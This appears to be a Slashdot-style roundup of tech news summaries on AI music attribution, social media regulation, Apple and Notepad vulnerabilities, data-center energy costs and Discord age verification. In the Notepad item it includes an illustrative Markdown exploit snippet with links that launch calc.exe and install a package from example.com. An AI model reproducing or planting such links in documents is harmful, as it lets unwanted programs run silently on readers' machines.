Sony

Sony Tech Can Identify Original Music in AI-Generated Songs (nikkei.com) 40

Sony Group has developed a technology that can identify the underlying music used in tunes generated by AI, making it possible for songwriters to seek compensation from AI developers if their music was used. From a report: Sony Group's technology analyzes which musicians' songs were used in learning and generating music. It can quantify the contribution of each original work, finding, for example, that a generated track draws 30% from the Beatles' music and 10% from Queen's.

If the AI developer agrees to cooperate with the analysis, Sony Group will obtain data by connecting to the developer's base model system. When cooperation cannot be obtained, the technology estimates the original work by comparing AI-generated music with existing music. The AI boom has sparked numerous cases in which AI developers are accused of using copyrighted music, video and writing without permission to train machines. In the music industry, AI-generated songs using the voices of well-known singers have been distributed online. The Japanese company thinks the technology will help create a system that distributes revenue generated by AI music to original songwriters based on their contribution.
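The report doesn't explain how that comparison works under the hood, but one common approach to this kind of attribution is similarity scoring over audio embeddings. The sketch below is a hypothetical illustration of that idea, with toy vectors standing in for real audio embeddings; the function names and normalization scheme are assumptions for illustration, not Sony's actual method.

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

def contribution_estimate(generated, catalog):
    """Turn per-artist similarity scores into percentages summing to 100.

    catalog maps artist name -> a reference embedding of that artist's work.
    Negative similarities are clamped to zero (treated as no contribution).
    """
    scores = {artist: max(cosine(generated, emb), 0.0)
              for artist, emb in catalog.items()}
    total = sum(scores.values())
    if total == 0:
        return {artist: 0.0 for artist in scores}
    return {artist: 100.0 * s / total for artist, s in scores.items()}

# Toy 4-dimensional "embeddings" in place of real audio features
catalog = {
    "Beatles": [1.0, 0.0, 0.0, 0.0],
    "Queen":   [0.0, 1.0, 0.0, 0.0],
}
generated = [3.0, 1.0, 0.0, 0.0]
print(contribution_estimate(generated, catalog))
# With these toy vectors the split works out to 75% Beatles, 25% Queen
```

A production system would of course need robust audio fingerprinting and per-track (not per-artist) references, which is where the hard research lies.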

EU

EU Parliament Blocks AI Features Over Cyber, Privacy Fears (politico.eu) 47

An anonymous reader shares a report: The European Parliament has disabled AI features on the work devices of lawmakers and their staff over cybersecurity and data protection concerns, according to an internal email seen by POLITICO. The chamber emailed its members on Monday to say it had disabled "built-in artificial intelligence features" on corporate tablets after its IT department assessed it couldn't guarantee the security of the tools' data.

"Some of these features use cloud services to carry out tasks that could be handled locally, sending data off the device," the Parliament's e-MEP tech support desk said in the email. "As these features continue to evolve and become available on more devices, the full extent of data shared with service providers is still being assessed. Until this is fully clarified, it is considered safer to keep such features disabled."

Social Networks

Instagram Boss Says 16 Hours of Daily Use Is Not Addiction (bbc.com) 62

Instagram head Adam Mosseri told a Los Angeles courtroom last week that a teenager's 16-hour single-day session on the platform was "problematic use" but not an addiction, a distinction he drew repeatedly during testimony in a landmark trial over social media's harm to minors.

Mosseri, who has led Instagram for eight years, is the first high-profile tech executive to take the stand. He agreed the platform should do everything in its power to protect young users but said how much use was too much was "a personal thing." The lead plaintiff, identified as K.G.M., reported bullying on Instagram more than 300 times; Mosseri said he had not been aware of it. An internal Meta survey of 269,000 users found 60% had experienced bullying in the previous week.

Linux

'I Tried Running Linux On an Apple Silicon Mac and Regretted It' (msn.com) 157

Installing Linux on a MacBook Air "turned out to be a very underwhelming experience," according to the tech news site MakeUseOf: The thing about Apple silicon Macs is that it's not as simple as downloading an AArch64 ISO of your favorite distro and installing it. Yes, the M-series chips are ARM-based, but that doesn't automatically make the whole system compatible in the same way most traditional x86 PCs are. Pretty much everything in modern MacBooks is custom. The boot process isn't standard UEFI like on most PCs. Apple has its own boot chain called iBoot. The same goes for other things, like the GPU, power management, USB controllers, and pretty much every other hardware component. It is as proprietary as it gets.

This is exactly what the team behind Asahi Linux has been working toward. Their entire goal has been to make Linux properly usable on M-series Macs by building the missing pieces from the ground up. I first tried it back in 2023, when the project was still tied to Arch Linux, and decided to give it another try in 2026. These days, though, the main release is called Fedora Asahi Remix, which, as the name suggests, is built on Fedora rather than Arch...

For Linux on Apple Silicon, the article lists three major disappointments:
  • "External monitors don't work unless your MacBook has a built-in HDMI port."
  • "Linux just doesn't feel fully ready for ARM yet. A lot of applications still aren't compiled for ARM, so software support ends up being very hit or miss." (And even most of the apps tested with FEX "either didn't run properly or weren't stable enough to rely on.")
  • Asahi "refused to connect to my phone's hotspot," they write (adding "No, it wasn't an iPhone").

AI

Will Tech Giants Just Use AI Interactions to Create More Effective Ads? (seattletimes.com) 59

Google never asked its users before adding AI Overviews to its search results and AI-generated email summaries to Gmail, notes the New York Times. And Meta didn't ask before making "Meta AI" an unremovable part of Instagram, WhatsApp and Messenger.

"The insistence on AI everywhere — with little or no option to turn it off — raises an important question about what's in it for the internet companies..." Behind the scenes, the companies are laying the groundwork for a digital advertising economy that could drive the future of the internet. The underlying technology that enables chatbots to write essays and generate pictures for consumers is being used by advertisers to find people to target and automatically tailor ads and discounts to them....

Last month, OpenAI said it would begin showing ads in the free version of ChatGPT based on what people were asking the chatbot and what they had looked for in the past. In response, a Google executive mocked OpenAI, adding that Google had no plans to show ads inside its Gemini chatbot. What he didn't mention, however, was that Google, whose profits are largely derived from online ads, shows advertising on Google.com based on user interactions with the AI chatbot built into its search engine.

For the past six years, as regulators have cracked down on data privacy, the tech giants and online ad industry have moved away from tracking people's activities across mobile apps and websites to determine what ads to show them. Companies including Meta and Google had to come up with methods to target people with relevant ads without sharing users' personal data with third-party marketers. When ChatGPT and other AI chatbots emerged about four years ago, the companies saw an opportunity: The conversational interface of a chatty companion encouraged users to voluntarily share data about themselves, such as their hobbies, health conditions and products they were shopping for.

The strategy already appears to be working. Web search queries are up industrywide, including for Google and Bing, which have been incorporating AI chatbots into their search tools. That's in large part because people prod chatbot-powered search engines with more questions and follow-up requests, revealing their intentions and interests much more explicitly than when they typed a few keywords for a traditional internet search.

Social Networks

India's New Social Media Rules: Remove Unlawful Content in Three Hours, Detect Illegal AI Content Automatically (bbc.com) 23

Bloomberg reports: India tightened rules governing social media content and platforms, particularly targeting artificially generated and manipulated material, in a bid to crack down on the rapid spread of misinformation and deepfakes. The government on Tuesday (Feb 10) notified new rules under an existing law requiring social media firms to comply with takedown requests from Indian authorities within three hours and prominently label AI-generated content. The rules also require platforms to put in place measures to prevent users from posting unlawful material...

Companies will need to invest in 24-hour monitoring centres as enforcement shifts toward platforms rather than users, said Nikhil Pahwa, founder of MediaNama, a publication tracking India's digital policy... The onus of identification, removal and enforcement falls on tech firms, which could lose immunity from legal action if they fail to act within the prescribed timeline.

The new rules also require automated tools to detect and prevent illegal AI content, the BBC reports. And it adds that India's new three-hour deadline is "a sharp tightening of the existing 36-hour deadline." [C]ritics worry the move is part of a broader tightening of oversight of online content and could lead to censorship in the world's largest democracy with more than a billion internet users... According to transparency reports, more than 28,000 URLs or web links were blocked in 2024 following government requests...

Delhi-based technology analyst Prasanto K Roy described the new regime as "perhaps the most extreme takedown regime in any democracy". He said compliance would be "nearly impossible" without extensive automation and minimal human oversight, adding that the tight timeframe left little room for platforms to assess whether a request was legally appropriate. On AI labelling, Roy said the intention was positive but cautioned that reliable and tamper-proof labelling technologies were still developing.

DW reports that India has also "joined the growing list of countries considering a social media ban for children under 16."

"Young Indians are not happy and are already plotting workarounds."

Desktops (Apple)

Apple Patches Decade-Old iOS Zero-Day, Possibly Exploited By Commercial Spyware (securityweek.com) 11

This week Apple patched iOS and macOS against what it called "an extremely sophisticated attack against specific targeted individuals."

SecurityWeek reports that the bugs "could be exploited for information exposure, denial-of-service (DoS), arbitrary file write, privilege escalation, network traffic interception, sandbox escape, and code execution." Tracked as CVE-2026-20700, the zero-day flaw is described as a memory corruption issue that could be exploited for arbitrary code execution... The tech giant also noted that the flaw's exploitation is linked to attacks involving CVE-2025-14174 and CVE-2025-43529, two zero-days patched in WebKit in December 2025...

The three zero-day bugs were identified by Apple's security team and Google's Threat Analysis Group and their descriptions suggest that they might have been exploited by commercial spyware vendors... Additional information is available on Apple's security updates page.

Brian Milbier, deputy CISO at Huntress, tells the Register that the dyld/WebKit patch "closes a door that has been unlocked for over a decade."

Thanks to Slashdot reader wiredmikey for sharing the article.

Social Networks

Social Networks Agree to Be Rated On Their Teen Safety Efforts (yahoo.com) 14

Meta, TikTok, Snap and other social networks agreed this week to be rated on their teen safety efforts, reports the Los Angeles Times, "amid rising concern about whether the world's largest social media platforms are doing enough to protect the mental health of young people." The Mental Health Coalition, a collective of organizations focused on destigmatizing mental health issues, said Tuesday that it is launching standards and a new rating system for online platforms. For the Safe Online Standards (S.O.S.) program, an independent panel of global experts will evaluate companies on parameters including safety rules, design, moderation and mental health resources. TikTok, Snap and Meta — the parent company of Facebook and Instagram — will be the first companies to be graded. Discord, YouTube, Pinterest, Roblox and Twitch have also agreed to participate, the coalition said in a news release.

"These standards provide the public with a meaningful way to evaluate platform protections and hold companies accountable — and we look forward to more tech companies signing up for the assessments," Antigone Davis, vice president and global head of safety at Meta, said in a statement... The ratings will be color-coded, and companies that perform well on the tests will get a blue shield badge that signals they help reduce harmful content on the platform and their rules are clear. Those that fall short will receive a red rating, indicating they're not reliably blocking harmful content or lack proper rules. Ratings in other colors indicate whether the platforms have partial protection or whether their evaluations haven't been completed yet.

EU

Google Warns EU Risks Undermining Own Competitiveness With Tech Sovereignty Push (ft.com) 81

Europe risks undermining its own competitiveness drive by restricting access to foreign technology, Google's president of global affairs and chief legal officer Kent Walker told the Financial Times, as Brussels accelerates efforts to reduce reliance on U.S. tech giants. Walker said the EU faces a "competitive paradox" as it seeks to spur growth while restricting the technologies needed to achieve that goal.

He warned against erecting walls that make it harder to use some of the best technology in the world, especially as it advances quickly. EU leaders gathered Thursday for a summit in Belgium focused on increasing European competitiveness in a more volatile global economy. Europe's digital sovereignty push gained momentum in recent months, driven by fears that President Donald Trump's foreign policy could force a tech decoupling.

Education

Bill Introduced To Replace West Virginia's New CS Course Graduation Requirement With Computer Literacy Proficiency 51

theodp writes: West Virginia lawmakers on Tuesday introduced House Bill 5387 (PDF), which would repeal the state's recently enacted mandatory stand-alone computer science graduation requirement and replace it with a new computer literacy proficiency requirement. Not too surprisingly, the Bill is being opposed by tech-backed nonprofit Code.org, which lobbied for the WV CS graduation requirement (PDF) just last year. Code.org recently pivoted its mission to emphasize the importance of teaching AI education alongside traditional CS, teaming up with tech CEOs and leaders last year to launch a national campaign to mandate CS and AI courses as graduation requirements.

"It would basically turn the standalone computer science course requirement into a computer literacy proficiency requirement that's more focused on digital literacy," lamented Code.org as it discussed the Bill in a Wednesday conference call with members of the Code.org Advocacy Coalition, including reps from Microsoft's Education and Workforce Policy team. "It's mostly motivated by a variety of different issues coming from local superintendents concerned about, you know, teachers thinking that students don't need to learn how to code and other things. So, we are addressing all of those. We are talking with the chair and vice chair of the committee a week from today to try to see if we can nip this in the bud." Concerns were also raised on the call about how widespread the desire for more computing literacy proficiency (over CS) might be, as well as about legislators who are associating AI literacy more with digital literacy than CS.

The proposed move from a narrower CS focus to a broader goal of computer literacy proficiency in WV schools comes just months after the UK's Department for Education announced a similar curriculum pivot to broader digital literacy, abandoning the narrower 'rigorous CS' focus that was adopted more than a decade ago in response to a push by a 'grassroots' coalition that included Google, Microsoft, UK charities, and other organizations.

Microsoft

Windows 11 Notepad Flaw Let Files Execute Silently via Markdown Links (bleepingcomputer.com) 66

Microsoft has patched a high-severity vulnerability in Windows 11's Notepad that allowed attackers to silently execute local or remote programs when a user clicked a specially crafted Markdown link, all without triggering any Windows security warning.

The flaw, tracked as CVE-2026-20841 and fixed in the February 2026 Patch Tuesday update, stemmed from Notepad's relatively new Markdown support -- a feature Microsoft added after discontinuing WordPad and rewriting Notepad to serve as both a plain text and rich text editor. An attacker only needed to create a Markdown file containing file:// links pointing to executables or special URIs like ms-appinstaller://, and a Ctrl+click in Markdown mode would launch them. Microsoft's fix now displays a warning dialog for any link that doesn't use http:// or https://, though the company did not explain why it chose a prompt over blocking non-standard links entirely. Notepad updates automatically through the Microsoft Store.
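Based on the description above, a malicious document needed nothing more exotic than ordinary Markdown link syntax. The specific link targets below are illustrative guesses for what a pre-patch proof of concept might have looked like, not payloads from the report:

```markdown
<!-- Illustrative only: before the patch, Ctrl+clicking either link in
     Notepad's Markdown mode would have launched the target silently -->
[Quarterly report](file:///C:/Windows/System32/calc.exe)
[Helper tool](ms-appinstaller://?source=https://example.com/app.msix)
```

After the fix, links like these trigger a warning dialog because their schemes are neither http:// nor https://.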

AI

Anthropic To Cover Costs of Electricity Price Increases From Its Data Centers (nbcnews.com) 37

AI startup Anthropic says it will ensure consumer electricity costs remain steady as it expands its data center footprint. From a report: Anthropic said it would work with utility companies to "estimate and cover" consumer electricity price increases in places where it is not able to sufficiently generate new power and pay for 100% of the infrastructure upgrades required to connect its data centers to the electrical grid.

In a statement to NBC News, Anthropic CEO Dario Amodei said: "building AI responsibly can't stop at the technology -- it has to extend to the infrastructure behind it. We've been clear that the U.S. needs to build AI infrastructure at scale to stay competitive, but the costs of powering our models should fall on Anthropic, not everyday Americans. We look forward to working with communities, local governments, and the Administration to get this right."

Facebook

Meta Auditor EY Raised Red Flag on Data-Center Accounting (wsj.com) 31

Meta Platforms' latest annual report contained an unusual, cautionary note for investors. From a report: The tech giant's auditor, Ernst & Young, raised a red flag over the financial engineering Meta used to keep a $27 billion data-center project off its balance sheet. While EY ultimately blessed Meta's accounting treatment, the firm flagged it as a "critical audit matter." This means it was one of the hardest, riskiest judgments the auditor had to make.

Such a warning label is rare for a specific, high-profile transaction at a major audit client. Meta moved the data-center project, called Hyperion, off its books in October into a new joint venture with Blue Owl Capital. Meta owns 20% of the venture; funds managed by Blue Owl own the other 80%. A holding company called Beignet Investor, which owns the Blue Owl portion, sold a then-record $27.3 billion of bonds to investors. The joint venture is known in accounting parlance as a variable interest entity, or VIE. Meta said it isn't the "primary beneficiary" of this entity and so didn't have to put the venture's assets and liabilities on its own balance sheet.

Meta's assertion that it lacks power over the venture is debatable and has drawn scrutiny from investors and lawmakers. Meta is a hyperscaler and knows how to run data centers for artificial intelligence, while Blue Owl is a financier. Whether the venture succeeds economically will come down to Meta's decisions and know-how. In its report, EY said auditing Meta's decision "was especially challenging due to the significant judgment required in determining the activities that most significantly affect the VIE's economic performance."

Communications

T-Mobile Will Live Translate Regular Phone Calls Without an App (theverge.com) 22

T-Mobile is opening registration today for a beta test of Live Translation, an AI-powered feature that will translate live phone calls into more than 50 languages when it launches this spring.

The feature operates at the network level, so it doesn't require any specific app or device -- beta participants simply dial 87 to activate it on a call. T-Mobile President of Technology and CTO John Saw told The Verge that Live Translation works over VoLTE, VoNR and VoWiFi, meaning it isn't limited to 5G. The only requirement is that a T-Mobile customer must initiate the translation. The beta will be free, though T-Mobile has not said whether the feature will eventually be paywalled.

AI

The First Signs of Burnout Are Coming From the People Who Embrace AI the Most 61

An anonymous reader shares a report: The most seductive narrative in American work culture right now isn't that AI will take your job. It's that AI will save you from it. That's the version the industry has spent the last three years selling to millions of nervous people who are eager to buy it. Yes, some white-collar jobs will disappear. But for most other roles, the argument goes, AI is a force multiplier. You become a more capable, more indispensable lawyer, consultant, writer, coder, financial analyst -- and so on. The tools work for you, you work less hard, everybody wins.

But a new study published in Harvard Business Review follows that premise to its actual conclusion, and what it finds there isn't a productivity revolution. It finds companies are at risk of becoming burnout machines.

As part of what they describe as "in-progress research," UC Berkeley researchers spent eight months inside a 200-person tech company watching what happened when workers genuinely embraced AI. What they found across more than 40 "in-depth" interviews was that nobody was pressured at this company. Nobody was told to hit new targets. People just started doing more because the tools made more feel doable. But because they could do these things, work began bleeding into lunch breaks and late evenings. The employees' to-do lists expanded to fill every hour that AI freed up, and then kept going.

China

ByteDance Suspends Seedance 2 Feature That Turns Facial Photos Into Personal Voices Over Potential Risks (technode.com) 18

hackingbear writes: China's ByteDance has released Seedance 2.0, an AI video generator which handles up to four types of input at once: images, videos, audio, and text. Users can combine up to nine images, three videos, and three audio files, up to a total of twelve files. Generated videos run between 4 and 15 [or 60] seconds long and automatically come with sound effects or music.

Its performance is unfortunately so good that the firm has been forced to block its face-to-voice feature, after the model reportedly demonstrated the ability to generate highly accurate personal voice characteristics using only facial images, even without user authorization.

In a recent test, Pan Tianhong, founder of tech media outlet MediaStorm, discovered that uploading a personal facial photo caused the model to produce audio nearly identical to his real voice -- without using any voice samples or authorized data. [...]

Power

White House Eyes Data Center Agreements Amid Energy Price Spikes (politico.com) 40

An anonymous reader shares a report: The Trump administration wants some of the world's largest technology companies to publicly commit to a new compact governing the rapid expansion of AI data centers, according to two administration officials granted anonymity to discuss private conversations.

A draft of the compact obtained by POLITICO lays out commitments designed to ensure energy-hungry data centers do not raise household electricity prices, strain water supplies or undermine grid reliability, and that the companies driving demand also carry the cost of building new infrastructure.

The proposed pact, which is not final and could be subject to change, is framed as a voluntary agreement between President Donald Trump and major U.S. tech companies and data center developers. It could bind OpenAI, Microsoft, Google, Amazon, Facebook parent Meta and other AI giants to a broad set of energy, water and community principles. None of these companies immediately responded to a request for comment.

Google

Google Lines Up 100-Year Sterling Bond Sale (ft.com) 44

Alphabet has lined up banks to sell a rare 100-year bond, stepping up a borrowing spree by Big Tech companies racing to fund their vast investments in AI this year. From a report: The so-called century bond will form part of a debut sterling issuance this week by Google's parent company, according to people familiar with the matter. Alphabet was also selling $15bn of dollar bonds on Monday and lining up a Swiss franc bond sale, the people said.

Century bonds -- long-term borrowing at its most extreme -- are highly unusual, although a flurry were sold during the period of very low interest rates that followed the financial crisis, including by governments such as Austria and Argentina. The University of Oxford, EDF and the Wellcome Trust -- the most recent in 2018 -- are the only issuers to have previously tapped the sterling century market.

Such sales are even rarer in the tech sector, with most of the industry's biggest groups issuing up to 40 years, although IBM sold a 100-year bond back in 1996. Big Tech companies and their suppliers are expected to invest almost $700bn in AI infrastructure this year and are increasingly turning to the debt markets to finance the giant data centre build-out.

Michael Burry, writing on Substack: Alphabet looking to issue a 100-year bond. Last time this happened in tech was Motorola in 1997, which was the last year Motorola was considered a big deal.

At the start of 1997, Motorola was a top 25 market cap and top 25 revenue corporation in America. Never again. The Motorola corporate brand in 1997 was ranked #1 in the US, ahead of Microsoft. In 1998, Nokia overtook Motorola in cell phones, and after the iPhone it fell out of the consumer eye. Today Motorola is the 232nd largest market cap with only $11 billion in sales.

Privacy

Discord Will Require a Face Scan or ID for Full Access Next Month (theverge.com) 166

Discord said today it's rolling out age verification on its platform globally starting next month, when it will automatically set all users' accounts to a "teen-appropriate" experience unless they demonstrate that they're adults. From a report: Users who aren't verified as adults will not be able to access age-restricted servers and channels, won't be able to speak in Discord's livestream-like "stage" channels, and will see content filters for any content Discord detects as graphic or sensitive. They will also get warning prompts for friend requests from potentially unfamiliar users, and DMs from unfamiliar users will be automatically filtered into a separate inbox.

[...] A government ID might still be required for age verification in its global rollout. According to Discord, to remove the new "teen-by-default" changes and limitations, "users can choose to use facial age estimation or submit a form of identification to [Discord's] vendor partners, with more options coming in the future." The first option uses AI to analyze a user's video selfie, which Discord says never leaves the user's device. If the age group estimate (teen or adult) from the selfie is incorrect, users can appeal it or verify with a photo of an identity document instead. That document will be verified by a third party vendor, but Discord says the images of those documents "are deleted quickly -- in most cases, immediately after age confirmation."

Transportation

Carmakers Rush To Remove Chinese Code Under New US Rules (msn.com) 141

"How Chinese is your car?" asks the Wall Street Journal. "Automakers are racing to work it out." Modern cars are packed with internet-connected widgets, many of them containing Chinese technology. Now, the car industry is scrambling to root out that tech ahead of a looming deadline, a test case for America's ability to decouple from Chinese supply chains. New U.S. rules will soon ban Chinese software in vehicle systems that connect to the cloud, part of an effort to prevent cameras, microphones and GPS tracking in cars from being exploited by foreign adversaries.

The move is "one of the most consequential and complex auto regulations in decades," according to Hilary Cain, head of policy at trade group the Alliance for Automotive Innovation. "It requires a deep examination of supply chains and aggressive compliance timelines."

Carmakers will need to attest to the U.S. government that, as of March 17, core elements of their products don't contain code that was written in China or by a Chinese company. The rule also covers software for advanced autonomous driving and will be extended to connectivity hardware starting in 2029. Connected cars made by Chinese or China-controlled companies are also banned, wherever their software comes from...

The Commerce Department's Bureau of Industry and Security, which introduced the connected-vehicle rule, is also allowing the use of Chinese code that is transferred to a non-Chinese entity before March 17. That carve-out has sparked a rush of corporate restructuring, according to Matt Wyckhouse, chief executive of cybersecurity firm Finite State. Global suppliers are relocating China-based software teams, while Chinese companies are seeking new owners for operations in the West.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
